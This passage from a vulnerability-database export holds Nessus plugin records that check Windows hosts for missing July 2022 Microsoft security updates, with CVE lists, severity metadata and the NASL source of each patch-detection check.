hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015832])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:00:51", "description": "The remote Windows host is missing security update 5015808.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30214, CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-22025, CVE-2022-22040, CVE-2022-22043, CVE-2022-30208)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30215, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21845, CVE-2022-22028, CVE-2022-22042, CVE-2022-22711, CVE-2022-30213, CVE-2022-30223)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015808: Windows 10 Version 1607 and Windows Server 2016 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015808.NASL", "href": "https://www.tenable.com/plugins/nessus/163052", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163052);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015808\");\n script_xref(name:\"MSFT\", value:\"MS22-5015808\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015808: Windows 10 Version 1607 and Windows Server 2016 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015808.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30214,\n CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-22025,\n CVE-2022-22040, CVE-2022-22043, CVE-2022-30208)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30215, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21845, CVE-2022-22028,\n CVE-2022-22042, CVE-2022-22711, CVE-2022-30213,\n CVE-2022-30223)\n\nNote that Nessus has not tested for these issues but has instead \nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015808\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015808\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015808\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30215\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015808'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015808])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:34", "description": "The remote Windows host is missing security update 5015814. It is, therefore, affected by multiple vulnerabilities:\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22038, CVE-2022-30211, CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015814: Windows 11 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015814.NASL", "href": "https://www.tenable.com/plugins/nessus/163041", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163041);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30216\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015814\");\n script_xref(name:\"MSFT\", value:\"MS22-5015814\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015814: Windows 11 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015814. It is, therefore, affected by multiple vulnerabilities:\n \n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30220, CVE-2022-30224, CVE-2022-30225,\n CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22038, CVE-2022-30211,\n CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015814\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015814\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015814\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015814'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015814])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:22", "description": "The remote Windows host is missing security update 5015811.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30214, CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30215, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015811: Windows 10 version 1809 / Windows Server 2019 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015811.NASL", "href": "https://www.tenable.com/plugins/nessus/163046", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163046);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015811\");\n script_xref(name:\"MSFT\", value:\"MS22-5015811\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015811: Windows 10 version 1809 / Windows Server 2019 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015811.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30214,\n CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30215, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015811\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015811\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30215\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015811'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015811])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:00:51", "description": "The remote Windows host is missing security update 5015807. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30214, CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30215, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015807: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", 